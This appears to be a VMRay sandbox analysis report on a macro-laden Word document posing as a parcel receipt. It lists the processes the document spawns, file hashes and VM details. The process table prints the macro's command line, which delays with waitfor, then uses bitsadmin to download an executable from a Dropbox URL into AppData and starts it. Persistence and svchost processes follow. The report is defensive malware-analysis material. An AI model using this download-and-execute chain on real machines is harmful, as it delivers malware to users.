Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2018-01-10 19:51 (UTC+1)
VM Analysis Duration Time 00:10:14
Execution Successful True
Sample Filename receipt-parcel-UK980-456.doc
Command Line Parameters False
Prescript False
Number of Processes 17
Termination Reason Timeout
Reputation Enabled True
Download Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 94
VTI Rule Type Documents
Tags
#evasion #malware
Remarks
Critical The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.
Critical The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.
Critical The operating system was rebooted during the analysis.
Screenshots
Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x954 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0xa50 Child Process Medium cmd.exe cmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\iuoldw.exe &start %appdata%\iuoldw.exe" #1
#3 0xa6c Child Process Medium waitfor.exe waitfor /t 5 YKERQ #2
#4 0xa90 Child Process Medium bitsadmin.exe bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe #2
#6 0x65c Child Process Medium iuoldw.exe C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe #2
#7 0x7a8 Child Process Medium roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" #6
#8 0x7f0 Child Process Medium cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\updaa5900b0.bat" #6
#12 0x634 Child Process Medium svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs #7
#13 0x5fc Child Process Medium svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs #7
#15 0x6a4 Autostart Medium roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" -
#16 0x320 Child Process Medium svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs #15
#17 0x7f8 Child Process Medium svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs #15
#20 0x594 Child Process Medium upde25b4796.exe "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe" #16
#22 0x7e8 Child Process Medium roottools.exe "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" #20
#23 0x6a4 Child Process Medium cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat" #20
#24 0x638 Child Process Medium svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs #22
#25 0x7e0 Child Process Medium svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs #22
Sample Information
ID #20911
MD5 Hash Value 1dfa6c28e296b4196f92c8b97e050754
SHA1 Hash Value b8c701c3a0059820ee60111aa3cc6add2dbc33d0
SHA256 Hash Value 880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772
Filename receipt-parcel-UK980-456.doc
File Size 109.00 KB (111616 bytes)
File Type Word Document
Has VBA Macros True
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-12-15 17:49
Microsoft Office Version 2016
Microsoft Word Version 16.0.4266.1003
Internet Explorer Version 8.0.7601.17514
Chrome Version 59.0.3071.115
Firefox Version 25.0
Flash Version 11.2.202.233
Java Version 7.0.710
VM Name win7_64_sp1-mso2016
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image